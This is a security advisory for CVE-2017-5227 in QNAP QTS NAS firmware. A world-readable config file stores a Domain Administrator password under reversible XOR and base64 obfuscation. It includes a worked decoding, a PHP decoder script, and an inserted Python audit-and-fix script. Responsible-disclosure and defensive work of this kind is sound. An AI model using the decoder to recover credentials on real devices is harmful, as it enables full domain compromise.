QNAP QTS Privilege Escalation / Information Disclosure

Posted Mar 23, 2017
Authored by Pasquale Fiorillo, Guido Oricchio

QNAP QTS versions prior to 4.2.4 suffer from a sensitive data exposure vulnerability that allows for privilege escalation.

tags | exploit
advisories | CVE-2017-5227
SHA-256 | 3d248b7122dde92c3c6cff49c15a639517a9a2504a008042fa15212812bc6b27


QNAP QTS Domain Privilege Escalation Vulnerability

Name Sensitive Data Exposure in QNAP QTS
Systems Affected QNAP QTS (NAS), all models and all versions < 4.2.4
Severity High 7.9/10
Impact CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
Vendor http://www.qnap.com/
Advisory http://www.ush.it/team/ush/hack-qnap/qnap.txt
Authors Pasquale "sid" Fiorillo (sid AT ush DOT it)
Guido "go" Oricchio (g.oricchio AT pcego DOT com)
Date 20170322


QNAP Systems, founded in 2004, provides network attached storage (NAS)
and network video recorder (NVR) solutions for home and business use to
the global market.
QNAP also delivers a cloud service, called myQNAPcloud, that allows
users to access and manage the devices from anywhere.
QTS is the proprietary, Linux-based firmware of QNAP devices.

ISGroup (http://www.isgroup.biz/) is an Italian information security
boutique; we found this 0-day issue while supporting Guido Oricchio
of PCego, a system integrator, in securing a QNAP product for one of his

Responsible disclosure with QNAP: we contacted QNAP at the public security@
contact and quickly escalated to their Security Researcher Myron Su over
PGP email.

Prior vulnerabilities in QNAP:

Information to customers of the vulnerability is shown in their bulletin
ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
QTS 4.2.4 Build 20170313 includes security fixes for the following
vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
reported by Pasquale Fiorillo of the cyber security company ISGroup
(www.isgroup.biz), a cyber security company, and Guido Oricchio of
PCego (www.pcego.com), a system integrator.

The latest version of the software at the time of writing can be
obtained from:



The vulnerability allows a local QTS admin user, or another low-privileged
user, to access a configuration file that includes a weakly encrypted
Microsoft Domain Administrator password if the NAS was joined to a
Microsoft Active Directory domain.

The affected component is the "uLinux.conf" configuration file, which is
created with world-readable permissions and is used to store a Domain
Administrator password.

The admin user can access the file over SSH, which is enabled by default.
Other users are not allowed to log in, so they would have to exploit
another component, such as a web application, to run arbitrary commands
or read arbitrary files.

TL;DR: Anyone able to read the uLinux.conf file, which is world-readable by
default, can escalate to Domain Administrator if the NAS is a domain


QNAP QTS stores the "uLinux.conf" configuration file in a directory
accessible by "nobody" and with permissions that make it readable by

If the NAS was joined to an Active Directory domain, this file contains a
Domain Administrator username and password in an easily decrypted format.

In older versions of QTS the Domain Admin's password was stored in

A) Config file readable by "nobody"

[~] # ls -l /etc/config/uLinux.conf
-rw-r--r-- 1 admin administ 7312 Dec 10 06:39 /etc/config/uLinux.conf

Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U,
TS-469L, and TS-221. Access to the file is granted to all local users,
such as httpdusr, the account used to run web sites and web applications
hosted on the NAS.

This puts all the information contained in the configuration file at
risk and is a violation of the principle of least privilege.


B) Weakly encrypted password in the configuration file

The Microsoft Active Directory Admin username and password are stored
in the file obfuscated with a simple XOR cipher and then base64 encoded.

In this scenario, a Local File Read vulnerability could lead to full
domain compromise, given that an attacker can reuse such credentials to
authenticate against a Domain Controller with maximum

The password field in the uLinux.conf has the following format:

User = <username>
Password = <base64>

User = Administrator

The "<base64>" decoded is:

sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
00000000 03 03 00 00 01 01 06 06 07 07 04 04 23 23 20 20 |............## |
00000010 21 21 26 26 27 27 24 24 43 |!!&&''$$C|

Each byte XORed with \x62 gives the ASCII code of the plaintext character:
\x03 ^ \x62 = \x61 (a)
\x00 ^ \x62 = \x62 (b)
\x24 ^ \x62 = \x46 (F)
\x43 ^ \x62 = \x21 (!)

The plaintext password is: aabbccddeeffAABBCCDDEEFF!


The following code can be used to decode the password:

#!/usr/bin/php
<?php
// Reverse the obfuscation: base64-decode, then XOR every byte with 0x62
$plaintext = str_split(base64_decode($argv[1]));
foreach ($plaintext as $chr) {
    echo chr(ord($chr) ^ 0x62);
}
echo "\n";

Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
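The following Python script is an added example written for this page; it is not part of the advisory or of any QNAP code. It audits a uLinux.conf-style file for the two findings above: (A) the world-readable mode bits shown in the ls -l output, and (B) a Password value that is only base64(XOR 0x62) obfuscated. The sample file contents are constructed from the User/Password format and base64 value given in the advisory; the helper names (parse_kv, deobfuscate, audit, restrict, demo) are assumptions of this example. The audit reports that the field is reversible rather than printing its contents, and restrict() applies the least-privilege fix of dropping the group/other read bits.

```python
import base64
import os
import stat
import tempfile

# Added example, not advisory code. XOR key as observed in the advisory's analysis.
XOR_KEY = 0x62

# Constructed sample in the "Key = Value" format the advisory shows for uLinux.conf.
SAMPLE_CONF = """\
User = Administrator
Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
"""


def parse_kv(text):
    """Parse 'Key = Value' lines into a dict; lines without '=' are skipped."""
    out = {}
    for line in text.splitlines():
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        out[key.strip()] = value.strip()
    return out


def deobfuscate(b64_value):
    """Reverse the advisory's scheme: base64-decode, then XOR every byte with 0x62."""
    raw = base64.b64decode(b64_value)
    return bytes(b ^ XOR_KEY for b in raw).decode("ascii")


def is_world_readable(path):
    """Finding (A): true if the 'other' read bit (the last 'r' in rw-r--r--) is set."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit(path):
    """Return a list of findings for a uLinux.conf-like file at `path`."""
    findings = []
    if is_world_readable(path):
        findings.append("world-readable config file")
    with open(path, "r", encoding="ascii") as fh:
        kv = parse_kv(fh.read())
    if "Password" in kv:
        try:
            # Finding (B): if XOR 0x62 yields printable text, the value is
            # merely obfuscated, not encrypted. The cleartext is not reported.
            if deobfuscate(kv["Password"]).isprintable():
                findings.append("Password field is reversible XOR/base64 obfuscation")
        except (ValueError, UnicodeDecodeError):
            pass  # not the known obfuscation format
    return findings


def restrict(path):
    """Mitigation for (A): owner-only access. Returns the world-readable state afterwards."""
    os.chmod(path, 0o600)
    return is_world_readable(path)


def demo():
    """Write the constructed sample with the advisory's 0644 mode, audit it, then fix it."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w", encoding="ascii") as fh:
        fh.write(SAMPLE_CONF)
    os.chmod(path, 0o644)  # -rw-r--r--, as in the advisory's ls -l output
    try:
        return {
            "findings": audit(path),
            "world_readable_after_restrict": restrict(path),
        }
    finally:
        os.remove(path)


if __name__ == "__main__":
    print(demo())
```

Running the script prints both findings for the constructed file and confirms that, after restrict(), the file is no longer world-readable; the password itself is never echoed, which is the behaviour a defender-side audit script should have.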

The vendor released QTS 4.2.4 Build 20170313, which contains the proper
security patch. At the time of this writing, an official patch is
available.


MITRE assigned CVE-2017-5227 to this vulnerability; internally at QNAP it
is referred to as Case NAS-201703-21.


20161212 Bug discovered
20170106 Request for CVE to Mitre
20170106 Disclosure to security@qnap.com
20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
20170107 Details disclosure to Myron Su
20170109 Got CVE-2017-5227 from cve-assign
20170110 Myron Su confirms the vulnerability
20170203 We ask for updates, no release date from vendor
20170215 We extend the disclosure date as 28 Feb will not be met
20170321 QNAP releases the QTS 4.2.4 Build 20170313
20170322 Advisory disclosed to the public


[1] Top 10 2013-A6-Sensitive Data Exposure
[2] Access Control Cheat Sheet
[3] https://forum.qnap.com/viewtopic.php?t=68317
    20121213 User reporting that the password was stored in plaintext in
    a world-readable file
[4] https://www.qnap.com/en/support/con_show.php?cid=113
    QNAP Security Bulletin NAS-201703-21


Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the
discovery of this vulnerability.

Pasquale "sid" Fiorillo
web site: http://www.pasqualefiorillo.it/
mail: sid AT ush DOT it

Guido "go" Oricchio
web site: http://www.pcego.com/
mail: g.oricchio AT pcego DOT com


Copyright (c) 2017 Pasquale "sid" Fiorillo

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
